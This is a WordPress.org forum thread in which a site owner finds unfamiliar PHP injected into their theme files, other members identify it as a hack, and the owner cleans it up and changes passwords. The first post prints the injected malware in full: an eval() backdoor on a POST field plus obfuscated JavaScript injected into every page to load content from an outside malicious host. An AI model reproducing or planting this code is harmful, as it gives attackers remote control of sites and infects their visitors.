WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Code appearing in the beginning of all my php files (10 posts)

  1. ronybigsoc
    Member
    Posted 5 years ago #

    Let me tell you I am not good with code AT ALL! I'm very much a beginner.

    I've noticed this code thrown in the beginning of my php files.

    I looked back to a backup and it never appeared before. I'm thinking I need to add some rights to some files/directories if this is bad.

    What do you think?

    Here it is...

    );?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCclMkZgJTJGJCUyRSUyRSUyRSQAJTNDI2QmJTY5JTc2JCUyMCFzdCU3OSMlNkN8ZT0mJTY0fiU2OSU3M3AkJTZDQGF5YCUzQSU2RUBvQCU2RWAlNjUlM0UkXG58ZCU2RkAlNjNAJTc1YG0lNjUmbnR8JTJFISU3N2AlNzJpdCElNjUhJTI4ISImJTNDJTJGdCElNjUlNzhAdGElNzJlIWElM0UiKUA7I3YhJTYxciYlMjAkJTY5fiUyQ18sQCU2MSUzRHwlNUIiMiExOC45JTMzfi4lMzIjMCUzMiYuITYhJTMxIyUyMn4sfCUyMiMlMzclMzgjJTJFMSMlMzFgMC5gMTclMzUhLiUzMiElMzEkJTIyfl1gO19APWAlMzEkJTNCJTY5YCU2NiYlMjhAJTY0byQlNjMlNzUlNkR+ZXwlNkUlNzQlMkUlNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3NCYlM0VpJTY2JihgJTVGYCUyOSU2NG8lNjMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(

  2. compguru910
    Member
    Posted 5 years ago #

    Wait, so everytime you load a page, this is showing up as text? Or is this showing up actually in the code?

  3. compguru910
    Member
    Posted 5 years ago #

    If this is being added to your pages, its most likely a plugin, or more regrettably a hack. Ive had problems with my websites being hacked and code being placed at the end to add adds in and what not

  4. lindsayanng
    Member
    Posted 5 years ago #

    that is most likely a hack.. i have no seen one plugin that is THAT bad.. I mean, ive seen messy ones, but not like that.. Seems as though you have been hacked.

  5. iridiax
    Member
    Posted 5 years ago #

    Looks and sounds like a hack to me too.

  6. ronybigsoc
    Member
    Posted 5 years ago #

    Wait, so everytime you load a page, this is showing up as text? Or is this showing up actually in the code?

    If I edit my php files this is thrown in the beginning randomly in the middle of my code.

  7. ronybigsoc
    Member
    Posted 5 years ago #

    Okay, well I'm guessing I need to remove them from all my php files. Luckily, it's only the main ones.

    My guess is that my security rights for those php files/directories are not secure.

    CRAP! I just found out that if I click on any of the links on my page, I get a google Malware warning.

    It says:

    Warning: Visiting this site may harm your computer!

    The website at religiontranscends.com contains elements from the site 78.110.175.21, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 78.110.175.21.
    Learn more about how to protect yourself from harmful software online.

  8. compguru910
    Member
    Posted 5 years ago #

    Yep, youve been hacked my friend. I wouldnt say that its your files that arent secure. Most likely its your password, or your web hosting provider. I had the same problem with a couple of my sites with globat. They wouldnt own up to it, so I switched to godaddy, and not a problem since.

  9. ronybigsoc
    Member
    Posted 5 years ago #

    I switched from ixwebhosting to media temple.

    Okay I'm going to remove the code and change all my passwords for logins and ftp's.

    Hopefully this works.

  10. ronybigsoc
    Member
    Posted 5 years ago #

    Ok, well I removed that code from all my theme php's. Then, I scanned through my root php's to make sure nothing there had been tinkered with.

    Next, I changed all my passwords.

    INSTANTLY, the site lets me browse wherever I want to with NO Malware errors.

    Thanks all for giving me your input. It really helped me.

Topic Closed

This topic has been closed to new replies.

About this Topic